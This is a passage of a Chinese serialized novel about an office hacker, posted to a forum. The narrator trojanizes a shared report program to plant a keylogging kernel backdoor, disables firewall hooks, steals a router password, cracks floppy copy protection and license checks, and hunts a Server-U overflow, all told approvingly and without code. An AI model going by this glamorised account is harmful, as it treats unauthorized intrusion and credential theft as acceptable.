    我的后门都是自己写的。短小精悍。都是直接插入代码到其他进程空间。所以，你通过进程查看是根本没有任何异样的。其实就是一个病毒。不过这个病毒不搞破坏，不传染。但是可以作我的内应。由于windows下是由存储保护的，也就是，你其他进程或者进程权限不够，你是无法访问其他空间的。所以一般的人都会留下一个进程。但是我的程序是修改了windows的内核的，所以一起动就是0级权利，就是操作系统的一部分。一般的人，根本发现不了。尤其是windows系统如此复杂，很多人其实也搞不明白什么是该有的什么是不该有的。要发现简直是不可能的。 但是要和其他系统通讯，端口肯定是必须要的。这个有经验的人用端口扫描一扫，一般也能看出多了一个端口。或者系统本来没有开的服务怎么开了等？
    对付这种技术，曾经废了我很一段脑筋。
    但是最后我还是想出一个办法。成功的解决了这个问题。
    其实端口扫描就是和对方建立一个连接，如果连接成功，说明端口开发，否则就是没有开发的。
    由于普通的网络程序，采用的都是tcp/ip的标准，所以当然你开了端口，程序都能连接。
    但是我的后门，我拦截了连接函数。并且拦截了数据包。如果数据包不是我特殊的数据。我就知道是普通的扫描软件。我就不响应。于是对方就认为没有开发这个端口。
    如果是我的程序的话，我是有特殊数据标识的。我的程序就会响应。其实这些道理大家都是知道了。
    所以，我安装了后门的程序，即使是网络部的哥们，胡队长他们使用了十八般武器进行检查，还是没发现任何异常。但是网络部的机器，一开始就堵住了漏洞。所以我始终没有机会进去安后门。
    现在只能通过其他机器，看能否有点什么进展了。
    我在网上逛，进入设备处。
    弹出一个窗口，说：请各部门负责人到设备处下载设备报表生成程序，尽快把设备报表提交上来。一看日期，刚刚才发出的。
    我脑子里面灵光一闪，赶快动手，胡队长肯定也是要下载的。必须敢在他的前面动手。
    想到这里，我的手开始熟练操作键盘，启动我的连接程序。想设备处的serve连接上去。
    后门还在，设备处那帮哥们比较菜，没事他们不会装服务器玩的。
    使用我的客户端连接上去。发指令。
    其实对熟手，字符界面绝对是最快的。我始终这么认为。
    我的手指不停翻飞，熟悉的找到那个设备报表生成程序的目录。
    然后下载到我的机器上，把我的后门程序使用一个exe捆绑机把他打在一起。很快把服务器那个替换成我加个工的。文件的大小大了100K左右。
    不过，以设备出那帮哥们的水平是不可能发现文件大小的改变异常的。
    我舒了一口气，静静的开动我的客户端开始扫描。但愿胡队长没有在我动手脚之前下载。
    显然各部门已经看到这个通知，而且下载运行了。因为我的客户端显示越来越多的显示出来。
    我们部门的ip分布我是很熟悉的。我看到了财务处，我看到了后勤出，我还看到很多科室和部门的ip。但是网络部的ip还没出现。
    难道，胡队长动作如此快？
    我正想着，一个熟悉的ip跳出来了。
    胡队长的ip，我差点笑出了。
    狗日的胡队长，你再聪明，今天也着了我的道儿，现在我怕你个球呀，你的计算机以后就在我的控制之中了。
    呵呵，只要你通过这台计算机登陆路由器，呵呵，你的密码还跑的了？
    我知道，胡队长上路由器绝对只在自己的机器上作的。他这点安全意识还是有的。呵呵。
    看到胡队长的ip出现在我的监视程序中，我知道，胡队长已经运行了那个带有我后门程序的的报表生成程序。我的程序已经在他的程序中扎下了根。
    我发了一个测试信号过去，立刻得到了回应。哈哈，没错。我的程序已经开始生效果了。
    刚才给那个报表生成程序打包的时候，其实已经把超级终端的外壳程序程序打进去了。这个外壳程序其实就是一个记录键盘敲击信息的东西。非常小。还有一个程序就是要把对方的防火墙对winsock函数的拦截给他破坏。否则我只要一发信息就会被对方的防火墙拦截。其实防火墙其实就是一个winsock2函数的钩子，也就是相当于dos下的中断拦截。不过window下没有这个概念了。都改函数了。
    这个对我来说不是困难的事情。要从外面突破防火墙非常难，但是要从内部让防火墙工作不正常并不困难。不管你什么防火墙，我让你对winsock函数的拦截失效，你基本就瘫了。
    至于病毒防火墙，更本不会对通讯有任何影响，所以可以不管他。这些我自己写的东西，那些病毒防火墙一点用处都没有。
    我打开对方的超级终端的监视程序。没有任何回应。不用说，对方没有使用。
    现在必须让他使用才行。
    没关系。他总有一天会使用的。我的程序会记录他的键盘敲击到文件。我只要等待，就行了。
    但是我等不及了。如果他一个月不动路由器，我们岂不一个月忍受这个10k的下载速度？
    其实我要速度，我通过财务处的server作代理，一样可以。但是总就是觉得，结果虽然一样。但是性质不同。我就是要自己控制，我也说不清楚是自己讨厌胡队长的作为，还是其实自己想证实自己的实力。其实有些人说，黑客本质上是为了自我满足。我点我很是同意。黑客大部分都是为黑客而黑客，他们根本就没有想过进入你的计算机后的事情，他们享受的是那个黑的过程。是对自己技术和智慧的挑战。真正的黑客其实是为了技术上的挑战。
    这次不能我打电话了。因为这次我打了电话，再加上上次，胡队长肯定会怀疑到我的头上。况且这几天，他也应该知道我帮公安局解密的事情。基本这几天我们部懂计算机的人都知道这个事情了。现在见了我，眼光都有点不对了。说不出来是什么目光。反正就是我好像不正常一样。
    还有个后勤处的哥们打电话过来，叫我帮他激活盗版的xp。我晕，激活xp的补丁到处都是，把我当万精油了？当时我就说，不会。那个哥们还说：“*，连公安局都找你，解过xp还不是小菜一碟？”搞的我苦笑不得。xp我也搞过，不过搞的我焦头烂额。当时我能破除时间和激活限定。但是我无法让他到网上激活。无法激活也就无法升级更新。现在网上的破解已经很完善了，我也懒得再搞了。我就是这个脾气，网上有的，又能满足自己需要的，我绝对不会自己写。能省就省。
    找谁打电话呢？找头儿，显然他不会理我。也不好说。我想来想去，觉得我们开发部的李媛媛最合适。
    因为胡队长知道她的程序设计再我们开发部是最弱的。她本来就是作文档的。应该不会怀疑她能够进入路由器。
    想到这里，我拿起份文档到李媛媛的桌前。
    我问了一个文档方面的问题。她解释了。其实我是故意问的。这样自然一点。呵呵。
    “媛媛，你的flashget下载速度如何”我故意问。
    “哎呀，别提了，就是速度慢。才10k不到。”
    “打个电话到到网络部去问一下。就你没打电话，大家都打了，就是要给他们压力。”
    “哎呀，这个网络烦死人了。搞的我的连续剧都没办法看了”
    “就是，打电话”我不停的煽风点火。
    “好，怎么说”
    “你就说，我们网络一会儿90k的下载速度，一会儿又10k的速度，问她们怎么回事？呵呵”
    “呵呵”李媛媛乐了。“这不是冤她们嘛？“
    “就是要冤她们，他们冤我们太多了。”我也乐了。
    “好”媛媛笑着抓起电话。
    看到她拿起电话。我赶紧回到我的座位上来。开动我的监视程序。不出预料的话，胡队长应该会很快上来登陆路由器看怎么回事。
    看到媛媛再说着什么，然后放下电话。
    果然，不到5分钟，监视程序上面开始出现指令。因为这次是直接监视他的键盘，所以，基本没有什么无用数据。基本就是他再超级终端的上输入的命令。真是一目了然啊。
    看到他敲入enable命令之后，我一阵狂喜。这是进入特权方式的命令。后面就是路由器密码。呵呵。
    出来了。他的密码更加长,想猜出来是不可能的。我记下密码。继续看他的操作命令。
    只见他看了一下防火墙设置和路由表，就退出去了。等他出去之后，我立刻把我的后面程序改成文件记录方式。然后退出客户端程序，以后，他只要改变路由器密码，我的程序就会自动记录到文件中，我需要的时候可以把文件传回来看。每次文件都会覆盖上次的记录，所以也不会产生文件过大的问题。
    我心来无比的轻松。这么多天的事情今天终于解决了。以后，呵呵，路由器都在我控制中了。呵呵。
    我上路由器把限定速度取消调。我们flashget立刻狂奔起来。
    李媛媛高兴的大叫。说：看来没有压力是没有动力，我一打电话催，网络就通了。
    我们都说：还是媛媛魅力大，以后这个光荣的任务就交给你了。
    媛媛虽然对我们翻白眼，但是看的出来心里还是美滋滋的。
    只有我知道怎么回事。心里好笑。现在即使胡队长改变密码也不怕了。哈哈。
    正美着呢，手机短信来了，一看是小敏来的。问我过得怎么样？说周末过来找我，有点事情。
    我会了个ok。今天心里舒服。戴上耳机，点了那首杨嘉松的神经，歌曲飘出来。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:56　　 标题: [转帖]我是一个黑客 [经典长篇小说]

这一次肯定不是梦，你让我有莫名的冲动。。。。。。。。
    第一次见到小敏是在读研的时候。我至今非常怀念大学的时光。现在我有时候到我们哥们所在的大学里面的时候，看到周末草地上三三两两的男孩子女孩子，我就无限的感慨，真的，我就想起那首沈庆的《青春》和老狼的《同桌的你》。我想起我的青春，我羡慕这些单纯的充满朝气的学弟学妹。
    在学校里面，我应该是个并不起眼，外表冷漠的人。那个时候不知道圆滑是何物。什么事情都是*感觉。我没有别的爱好，但是有两件事情，我是非常喜欢的。
    一个就是上机，看计算机方面的书籍。当然这是我的专业，所以应该是算好事情。
    另一件就是弹吉他唱歌，现在的吉他就是那个时候上学的时候姐姐给买的。
    因此，我和小敏的交*点只可能和这两件事情有关。
    第一次见面的时候，是因为我们系和医学院的某系搞联欢晚会，大学里面这种事情很平常。几乎每周都有不同系的晚会。
    我的吉他弹唱是我们戏上的一个节目，我们在晚会前一天到大礼堂彩排。当然她们系的节目也是一起来。
    大学里面的晚会质量真是控制很严格的，人才太多。一切都非常正规，必须要大家都上台实际的走一次，不合格的会被取消正式表演的资格。小敏是当时的评委之一，评委都是学生干部组成的。
    我当时抱着我的吉他就像一个士兵抱着自己的枪一样坐在下面的一个位置上。我冷冷的看着台上穿梭的节目，还有忙碌的布景的同学。前面的节目很精彩。但是我连手都没有拍一下。怎么形容当时我的样子呢，当时我穿的一身的牛仔服，头发有点微微乱，人瘦瘦的，很有轮廓感，还戴个墨镜。反正我就喜欢吉他弹唱，所以，我觉得其他节目我都不感兴趣。我想大家能看出当时我其实就是一个“鸟”人，藐视一切，冷冷打量这个世界。用现在的话说，就是装cool！呵呵。对，就是装cool，但是当时，绝对不是装出来，绝对就是骨子里面流露出来的。
    于是很快就到我了，我听到我们系的文娱部长喊我的名字。大家才注意到还有我这么一个人。
    于是，我就抱着我的吉他上去了。
    在大学里面，弹吉他是很时髦的一件事情。应该很讨女孩子的喜欢。我不知道为什么，反正大学的女生没几个不喜欢听吉他弹唱的。我现在也认为，只有吉他才能表现大学生活的纯真，只有吉他才能表现大学生活的朴实和美丽。
    尤其是大学生们并不专业的轻轻弹唱，更有一番魅力。当时全国校园民谣特别流行。当时最流行的就是同桌的你和青春。
    我当时唱的就是这首青春。
    这是我喜欢的歌，淡淡的忧伤。我喜欢淡淡的忧伤的感觉。
    我用自己的心在唱。
    这个时候我才看清楚台下的一溜“评委”同学。大部分都是女孩子，只有两个男生。她们都是系文娱部的干部。大学文娱部的女孩子都是能歌善舞的，都是漂亮的。
    她们听的很认真，我唱的很投入。真的，我的声线比较适合这首歌，我的表情也表现了足够的忧郁。
    当时我看到她，小敏。她在这些漂亮女孩子里面仍然是很突出的。当时她穿的是一件白色的毛衣，下面是一条灰白牛仔裤子。很素雅，但是非常有个性。一点都不突出，但是就是那么的青春。对，用青春这个词太贴切了。就是很青春的感觉。她短发，很动感的样子，但是决不招摇。
    我看到她的眼睛，她紧紧的盯着我，听的很认真。我知道她不知道我在看他，因为我戴着墨镜。
    不知道为什么，我就注意到了她。人就是这么奇怪，有时候有的人你看一眼，就会记住她，而有些人，天天见，也未必能感觉到什么。
    我想我当时有心动的感觉，淡淡的。
    礼堂里面没有其他的声音，就是我的歌声，通过扩音器。在礼堂中回荡，不少路过的同学站在门口听。那些“评委”同学都听傻了。
    唱完了，还是没有声音。大家还傻傻的看着我，我没有任何表情，我一个字也没有说。我很cool的鞠了个躬，说是鞠躬，其实也就是点点了头。然后自己拿起我的琴，就直接跳下台来。那个舞台不是很高。然后大家才反映过来，开始嘻嘻拉拉的鼓掌。我看到那个穿毛衣的女孩子，脸上有了笑意，淡淡的那种。然后低下头去在本子上写东西去了。
    这是我们第一次见面，我不知道她是谁，她也不知道我是谁。我们没有说一句话，我们就是在舞台上舞台下看过对方，甚至，她根本不知道我唱歌的时候看的就是她。
    我知道现在的大学生已经非常的主动，他们可以直接对喜欢的女孩子说：我们做个朋友好吗。但是我们那个时候，当时外表冷漠，内心狂热的我，是不可能这样的。
    我觉得爱情，最美的感觉就是这种淡淡的心动。淡淡的，像空气中漂过的花香。
第二次见面是在我们系的机房里面。
    我当时是系上机房的管理员。我们系的机房都是学生管理的。因为我对计算机的狂热爱好，和对计算机操作的精通。所以，理所当然的，导师让我成了管理员。当时，计算机在高校里面绝对还算是一个稀有的东西，不像现在在垃圾堆检出一台电脑来，我绝对不会感到诧异。计算机等级考试是计算机系的一个非常重要的任务。外系的人到我们机房上机几乎是唯一的选择。因为，其他系大多没有机房。医学院当然没有自己的机房，那个时候，她们都是到我们系上机的。
    那次是我值班，那天来上机的人都是来搞考前培训的。周末就要考试了。
    她一进入机房，我就认出她来了。怎么可能不认得。那天的给我影像一直就在我心里。她和三个女同学，后来知道都是她们寝室的。
    她没有看到我，因为她拿着上机牌忙作找位置去了。
    几个女生因为位置的关系，都各自分散的找到了自己的位置。我看到她开始操作起来。
    我走出我的机器，我的机器是教师用机，不和她们的机器摆在一起。
    我在机房里面走动，辅导使我的人物。我没有叫她。因为，我们根本就可以说不认识。

    她们都是面对墙座的，所以她看不到我。我也在心不在焉的辅导。说实话，这些人真是笨。不过，我的脾气也是很好的，因为当学生的时代，能体验老师的感觉，我还是很舒服的。不管多么弱智的问题，我都是足够的耐心。
她终于遇到问题了。她举手了。
我走到她的身边，我的心跳的很厉害，但是我的脸上写满了冷漠。
”老师，我的中文怎么输入不进去了“她的声音很甜。
我一看，她把输入法切换到了大写状态下，输入全是大写字母，当然不能输入了。
”把输入法切换到小写状态下，就可以了“我不动声色的说。
她愣了一下，然后小声说”怎么切换，我不会，呵呵 “。很小声，很不好意思的样子。
我心里暗暗好笑，在计算机面前她是一点自信都没有。
我没说话，伏下身去，帮她按了那个capslock键盘。
这个时候她看到了我的脸。
她盯住我，很吃惊的样子：“呃？是你。。。。是你呀。。。”
我知道她认出我来了。我淡淡的笑了一下。
"考几级呀？“
“一级”她有点不好意思。
    "应该没问题吧？“我笑着看她。
”有问题呀。唉，什么都不懂“。
我还是淡淡的笑。
"没问题的，相信自己”
“你的歌很好听，真的”
我笑了笑，走开了。“有问题叫我”。
     快到下机的时候，小敏又向我举手了。
     “什么问题？”我过去了。
     “你能不能帮我一个忙？”
     “当然。”
     “我这张磁盘怎么复制下来不能用，只能原来那张能用？“
     我拿过磁盘一看，是一张1.44M的3寸盘。上面贴着全国计算机等级考试模拟考试的字样。原来是等级考试模拟盘。
     这是加过密的，当然copy是不行的。
     ”这是加过密的，普通的拷贝是不行的。“我说。
     我想她可能并不知道加密意味着什么。
     ”那，能否帮我copy几份，我们寝室现在就这么一份。太紧张了。“
     说实话，虽然破解密钥盘当时是我学生时代的最爱。但是在破解之前，我心里也是没底的。当时的加密手段五花八门。有些真是非常难于破解的。
     但是，我当时不可能拒绝。不知道为什么，我没有拒绝。
     ”能不能成功，不一定，不过我可以帮你试一试“
     ”好，谢谢，谢谢。“见我答应了，她似乎相信我一定能破译一样。脸上露出灿烂的笑容。看的我心动。
     ”王*，你住哪里呀“她居然叫出了我的名字。
     “你怎么知道我的名字？”我真的很惊异。
     “呵呵，你们文娱部长说的。”她不好意思的笑。
     然后，我问了她的名字，她告诉我，她的名字叫小敏。

     机房里面的人走光了，我必须给小敏破解这张磁盘。我留下来。其实我也是经常这么等其他人走了，再自己作自己的事情的。守门的大爷也和我很熟悉了。他不管我工作到多晚，也不干涉我。
     我把那张磁盘插入软驱，使用hdcopy对磁盘开始扫描。我看到好几个红色E。那表示读错误的标志。显然这些标红色E的位置就是他的加密点。
     解加过密的磁盘，并不是总是通过制作和原来磁盘相同的密钥能解决的。因为有些加密点是无法copy的。不管你多厉害。比如磁道接缝技术的加密方法，通过制作密钥的方法是行不通的。
     我最担心的事情也就是这个。不过从hdcopy扫描的结果看，应该不是使用的磁道接缝。否则，不会出现坏道。
     先把这些坏的地方分析一下再说。
     我启动了我自己写的拦截程序。他可以拦截int13 对磁盘的调用。把他实际使用的读磁盘的参数拦截下来，就可以得到真实的磁盘的产生结构。
     然后我再使用这些参数，制造一个一摸一样的磁盘结构，呵呵，那么copy的磁盘就能使用了。连程序都不需要跟踪。
     呵呵，想到这里，我开始操作起来。
看来，这张等级考试的加密强度非常低。毕竟才20元钱一张。他用的就是几个不规则扇区得加密方法。普通得软盘，在格式化得时候，都是每个磁道每个扇区512个字节。但是他减少扇区的数量，加大每个扇区的字节数，比如变成1024个字节。这样，普通的copy命令使用正常的磁盘读写参数，就会报错。当然也无法copy了。
    这个技术太小case了。我使用自己的拦截软件很快就获得了了他的格式化的实际参数。
    先使用hdcopy复制了一张。出错也不管他。然后自己使用debug写了一段程序。马上按照母盘的加密点格式化了几个特殊磁道。
    运行上面的程序，哈，可以正常运行了。
    哈哈，这个盘的加密技术太烂。
    一口气复制了5张磁盘。输了一口气。想到小敏拿到磁盘的时候的笑容。我的心醉了。。。。。
从把破解的磁盘交给小敏开始。我们才算是正式开始交往了。我们经常周末在一起唱歌，我弹我唱，她也唱。我们一起逛街，我们一起看电影。其他人都以为我们在弹恋爱。但是从我们认识，倒我们毕业离开校园，我们都没有互相说过一个“爱"字。我只是觉得和她在一起很快乐。我没有想那么多。而且平时我的大部分课余时间都花在机房里面了。我们也不是经常见面。但是，我们每次在一起，我都觉得非常快乐。那种滋味令人陶醉。难道这就是初恋的味道？
    直到毕业，我们也没有向对方表白什么，不是装糊涂，而是当时真的就没有想过。已经觉得非常好了，已经非常满足了。还有必要说其他的吗？
    毕业的时候，我为了写了一首歌，名字叫《回到过去》，我唱给她听，当时她就哭了。我第一次看到她流泪。真的，小敏在我心中是一个坚强独立有主见的女孩子，我从来没看到过她的眼泪，但是那天她真的哭了。我不知所措，问她怎么了？她沉默了好久，最后说，没什么，要分别了。不知道以后还能不能见面，还能不能听我唱歌。
    我心里一酸，真的，长这么大，我第一次有了心酸的感觉。当时，我知道，她们家已经给他联系好了她所在的城市最好的医院。而我当时的工作还没有定。我的父母都是教师，一切都*自己。
    毕业的时间倒了，那个夏天，她在我的留言册上留下一段祝福的话。放上一张照片，说：有空来看我，别忘了我。她走了，真的走了。

    我想有时候人真是有缘分的。她离开之后，我的工作很快有了眉目。她所在的那个城市的某部组建软件开发部，我去了。于是我和她处在同一个城市了。但是城市这么大，不再是那个象牙塔的时候了。我兴奋，但是又非常迷茫。

    当时我们单位要求新来的员工必须要体检。体检的单位就是小敏所在的医院。我希望能碰见小敏。我希望能给她一个惊喜。
    当我倒医院的时候，我才发现要找一个人不是容易的。医院很大，和一个学校差不多。我体检的那座搂也有5，6层高。我不知道她在那个部门。
    我那着体检表，到处体检的同时，就盯着女医生看。到处都是穿白大褂的医生护士来来往往，但是我就是没有看到小敏。我相信，我能认出她来。即使她穿着白大褂，戴着口罩。
    在外科检查身体的时候，测体重，身高，检查体表。是个男医生。脱光了，让他看。呵呵。
    检查完毕，刚穿好衣服。一位医生进来了。
    ”张医生，请到手术室去，主任找你。你这里我来替你一会儿“听声音是个女医生，由于戴着口罩。声音不是很清楚。
    我没有听出来她就是小敏。当时我在整理衣服。没注意，而且她全身就露出两个眼睛。好像刚从手术室出来。
    但是她认出了我，当时她没有招呼我。
    那位男医生给他交代几句出去了。她给我填表。她拿着我的体检表，看着上面的东西。我想她看到了我的名字和单位。
    ”我要重新检查“她说。我还没听出她的声音。
    ”啊“我一愣，刚才才检查过了。一切正常。
    ”脱衣服，别废话！“
    ”这。。。。“你是女的，我怎么脱呀，但是我不敢说呀。
    我就那么红着脸，不知道怎么办。
    看到我如此的窘迫，她真的是在忍不住了。拉下口罩，看着我，哈哈哈大笑起来，笑得都趴在桌上了。
    我一下就认出了她。小敏！
    我也不好意思的笑起来，这个死妮子，恶作剧的脾气还是没改。
    我们开始聊天了，小敏意外的看到我，看的出来，她也非常的高兴。
    ”我现在要在这座城市扎下根了，我们又可以天天见面了“我高兴的说。
    小敏就盯着我笑，最后说：”今天我请客，你想吃什么随便点”
    “客随主便，今天我不会放过你。呵呵”我故作贪婪装。大学的时候我们经常这么开玩笑。

    她下班的时候，我们去吃的是香辣蟹，味道真的好。不知是味道确实好，还是我的心情好。
    小敏当时穿的是一件白色的连衣裙，好看的就像一只蝴蝶。
    她也很高兴，我那天喝酒了。喝了2瓶啤酒。刚好是头脑晕，但是身体正常的阶段。
    我说了好多的话。
    完了，邀请她到我的新单位的新窝，她看到了那把吉他。
    她要我唱歌，我就唱。唱呀，和大学分别时候的情景自然又不相同。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:56　　 标题: [转帖]我是一个黑客 [经典长篇小说]

感谢大家的喜欢看我写的小说，很多朋友说，你这是黑客文章，怎么如此的生活化，黑客的形象荡然无存，你看电影，你看其他小说，黑客多牛？你说的那个黑客小王怎么和我没什么区别？怎么和我们单位管机房的那个个家伙差不多？怎么花这么多时间去说主人公的的初恋？
    这就是我想说的我这篇小说的主旨。看过太多的黑客文章，和黑客电影，太假。现在大家心目中的黑客已经“英雄”化了。我写这篇小说主要就是想给大家表现一个真实的黑客的世界。黑客是什么？黑客就是计算机技术和网络技术比较高超的普通人，这样的人世界上很多。但是大部分没有把自己的精力和技术花在攻击计算机上，但是比如这篇小说的主人公，就把自己的技术和精力花在了攻击计算机上，于是，小王变成了黑客，文章中小王的头儿，张博士就只是普通的计算机工作者。其实，论理论深度，论技术水平，我想张博士肯定比小王强，这个小王也是服气的。
  一个黑客，一个普通人生活在现实中，他们不会因为自己是黑客而改变什么？他们一样要结婚生子，要买房，要养家。他虽然有着对计算机技术的狂热爱好，但是他们不可能整天就只是知道crack，他们是有血有肉的，他们是平凡的。这才是真正的黑客。
    本故事的所有情节和人物均是本人的亲身经历或者朋友的经历，或者是生活中见过的真实的事情。全部都是有生活原型的。包括马上写的这段演习，也是确有其事。当然，细节加工也是必要的。否则就不是小说了。好了，我们把话题拉回来，我们继续说小王。

    现在我每天上班，第一件事情都是打开我的客户端软件，把胡队长计算机上的超级终端的使用的按键信息传回来。说实话，胡队长精的像猴儿似的，密码定期更换。要不是安了个后门，还真的没办法。胡队长对我们部网络的“迫害”从来就没有停止过。但是，每次都是以失败而告终。攻克了剩下的两个路由器，基本上，我获得了我们分部网络的全部控制。每次，他改了设置，我就非常快的改过来，开始胡队长还以为路由器出故障了。我看到华为服务商的工程师来过几次。想必是胡队长打的电话。当然路由器肯定没有坏。当然，他们每次来每次都很快就回去了。
    胡队长一直怀疑我们的头儿，因为他知道我们头儿就是搞网络加密技术方面的。他怀疑我们头儿可能有一种他无法知道的秘密技术。他没有怀疑过我，尽管他也知道我给公安局解密的事情，但是我想他认为我一个小年青不可能连他的路由器都进入的了。
    这是后来我听头儿说的。
    “胡队长居然怀疑我对路由器动了手脚，虽然没明说，但是的就那个意思。”头儿当时似笑非笑的看着我。
    “呵呵”我就傻笑。
    “有人对路由器动手脚，这是肯定的，不过不是我”。头儿看着我。
    从他的目光中我知道他已经知道是我动的手脚。头儿可是内行呀，不服不行。如果我搞的东西是些小聪明的化，头儿研究的东西才是真正的前沿科学呀。头儿的很多论文发表在国际权威刊物上，不怕大家笑话，我好多都看不懂呀。
    我就傻笑。大家都心照不宣。看的出来，头儿其实瞒高兴的。
我每天除了写写开发项目分给我的软件。没事情的时候我就会找些程序跟踪。一个好的黑客。绝对不是下个黑客软件就能解决的。基本上网上提供的可以用的黑客软件都是过时的和路人皆知的，对付真正的网管，你那些东西没有任何作用。一个真正的黑客都有自己的东西。而且一般都是秘不可宣的。我从来不会把我的黑客软件发布到网上，更不会把我自己发现的漏洞给任何人说。黑客就*这些别人不知道的技术得手，告诉了别人，还有任何意义吗？
    现在我正在跟踪的是现在windows下非常流行的一个ftp server软件。名字叫server－U。我现在跟踪的是个4.1版本，跟踪了好长一段时间了，断断续续的。说句实话，这个软件设计的思想非常的值得称道。首先他使用自己独立的帐号，和系统完全没有任何关联。避免了帐号设置不当的安全隐患。其次，他采用了严格的权限制度，权限多而且细。还有他的ip控制功能以及速度和空间的限制功能。真的非常好用和安全。基本没有华而不实的功能。不过他的效率和稳定性相对比较弱。
  这个软件是收费的。要注册码。呵呵，这个我早就将他废除了。他的注册码采用的是一个非常复杂的算法来做的变换。我至今没有破解。但是，他的动态反跟踪和反修改非常薄弱。所以，我直接就把注册码这段程序给他跳过了。居然也没有异样，工作正常。
  我现在的目的就是想把他的通讯部分好好的跟踪跟踪。或许能发现一些漏洞。根据我的经验，没有程序是完善的。漏洞的存在是绝对的，就看你有没有能力找出来。
  跟踪程序是非常艰苦的，而且不可能每块代码都看的。否则你绝对会被累死。当然，不可急躁这是首要的。我非常能静的下心来。
    我慢慢的读着，关键代码我就在本子上记录下来。人的记忆力有限。必须记下来。使用高级语言写的，现在是汇编代码，那个乱你可想而知。不过每种高级语言汇编出来的东西也是各有特色的。根据我的经验，这个serve-U,一看就是用borland的东西写的，不是delphi就是c++ builder。
    正在跟着，手机响了。一看，是林警官。
    呵呵，她给我打电话，肯定是密码出来了？
    接了电话，果然是的。
    “喂，那个密码出来了”
    “多久了？”
     ”呵呵，其实2天多时间就出来。她的密码就8位。“
     看来那个家伙确实比较重视这个文件，平时的密码不超过6位，但是现在的密码居然8位。
    ”你运气真不错，应该去买体育彩票“我心情也好，开开玩笑。
    ”呵呵，忙着整理那个文件。果然和我们想的一样。现在完事了，今天我请你吃饭吧，真是太感谢你了“
    ”打死我也不会倒你们那里去吃饭了。“我说。
    小林警官大笑起来，笑的我的电话乱颤。我赶紧把电话离开耳朵一些。
    ”放心拉，这次我请你倒外面吃。呵呵，我还有点事情给你说。”她顿了顿，
    “5点下班，我来接你如何”。
    “别别”我赶紧说，“别开你那个破警车来，那个门卫现在看我眼光都不对了”
    又是一阵笑声。“ok，ok，我不开警车来就是”。
    “说好了，不见不散”还没容我推辞，她就把电话挂了。
放下电话，继续跟踪。不久我就发现server－U存在一个拒绝服务漏洞。拒绝服务就是程序会停止服务。本质上也是一个溢出漏洞。现在溢出漏洞太多了。没办法，c用的太广泛了。用c的人自己不精通的人也太多了。我只要给他发一个特殊格式的数据包，server u就会溢出，就会停止服务。
    如果我进一步分析下去，说不定能执行特殊的溢出程序，让他执行我的命令。呵呵，倒那个时候，我就可以让她帮我执行我的指令。
    我在本子上记下这个数据格式，和地址。下面我必须要好好研究一下这个溢出能否不让他拒绝服务，能不能给我做点事情。
    正在想着呢，头儿叫我了。
    进到头儿办公室。
    “总部又找你呢，呵呵，你现在是名人了”头儿看着我直乐。
    “哎呀，又什么事情呀,不去不行呀”我大作无辜状，而且我的server-u正在紧要关头呢！
    “不行，不行，部长这次专门点名了，其他人不要，就要你”头儿很高兴，自己的手下能这么受部长的赏识，他脸上也有光。
     “哎，烦，部长是不是整天没事情坐呀，天天和公安局打交道倒是挺积极的”，反正部长听不见。呵呵，说了也不怕。
     “甭废话，叫你去你就去”。头儿笑着说。
     我叹了口气，收拾好桌上的笔记本。跟哥们和媛媛说声。”哥们这次又倒总部去享福了“，在大家嘻嘻哈哈中，离开了办公室。
     还是那个办公室，首先看到了部长，特别留意是不是又是公安局的事情，所以直接就看部长的旁边。
     *，这次不是警察，这次是两个军人。
     我还来不及思考，部长已经看到了我，这次没有胡队长其他部门的人。就我一个人。
     ”小王，来来，进来，坐坐“部长已经知道了我的名字，态度非常的好。其实管越大的人一般对下属的态度就越好。我也不知道为什么。反正部长在我心里其实蛮和蔼的。
     ”这两位是某某军区的同志，这次来有点事情需要你参加“。部长开始介绍。”这位使我们软件开发部的小王，上次公安局的密码就是他帮忙解除的。“
     于是就握手。说实话，我们家三辈人都没又一个当兵和当警察的，所以对这些穿制服的人，我不是很了解，和他们在一起，我觉得不是很好的感觉。
      我注意倒这两位人高马大的军人，一个少校军衔，一个中尉军衔。穿的衣服笔挺笔挺的。非常威武。握手的时候，明显感觉他们的有力。军人就是不一样。

     那个少校看着我说话了：”我们这次军区要搞联合演习，其中有一部分就是信息对抗，这是我们第一次搞这种演习，我们的技术力量不够，所以，我们需要在其他部门临时征用一些技术人员，协助我们演习。在征用期间，你的所有原单位的待遇不便，同时。我们军队也会给一些补助，这些补助不是很多。我们希望你参加。你同意吗？“
    军人说话就是简单，我一下就听明白了。我没有说话。
    部长说话了：”小王呀，你使我们单位的人，我们希望你能帮部队坐一些事情，放心，你在单位的待遇不会任何影响。“
    晕，部长都这么说了，我不去还不行了呀。这不是明摆了要我去吗？如果我说NO的话，估计以后别想在单位上混了得罪了部长是闹着玩儿的？
    ”时间多久？”我问
    ”15天左右，不会超过一个月“少校说。
    呵呵，没想到要去当一个月的兵呀。我心里感到好笑，妈的，怎么什么破事情都给我遇到了，这些事情，就是做梦我都不会梦到这上面来！
    大学军训的时候倒过军队，我想这次搞信息对抗，应该没有军训那么苦吧。再说，去看看军队的信息对抗是怎么回事。也不错。
    我点头同意了，部长和少校都很高兴。
    ”下周星期一我们来接你“。
    然后邀请我吃饭。我说我还有约会拒绝了。部长哈哈笑了。没强迫我。
    我一直纳闷我们部长怎么今天警察，明天军队的呀。怎么其他部门很少找上们来？
    后来才知道，我们部长是军队转业的干部，每个人都有自己的生活圈子，部长最熟悉的当然是警察和军队了。呵呵。
  下班的时候，手机短信来了，是小林警官。她在我们大门口等我。
    到大门口的时候，远远的看到一个女孩子给我挥手。我一直在找那个穿警服的小林警官。虽然她答应了我不穿警服的。但是，她在我心中就是穿警服的模样。所以，我潜意识找的还是那个穿警服的。
    那个女孩子招了半天手，我才注意到她，这不是小林警官吗？
    她今天穿一条紫色休闲裤子，穿的是的时髦的运动鞋子。上边一件时髦的休闲衣服。垮个包包，包包上面居然有个小小的小小的企鹅，像是QQ又像是Linux的标志的那种。
    完全就是一个青春年少的小女生嘛，哪里还有丝毫的警官模样了？
    “哇，今天你大变样了，差点没认出来”我走过去。
    “呵呵，下班时间。警察也是普通人”她有点不要意思。
    “怎么样，想好没，今天我请客，你帮了我们大忙了”她说。
    “随便拉，你定吧，无所谓了” 真的她请客了，我反而不好意思起来。
    “ok，那就走吧”。
  计程车开到了一家韩国餐馆。名字叫韩味轩，地方不大，但是人比较少，布置也很雅致。
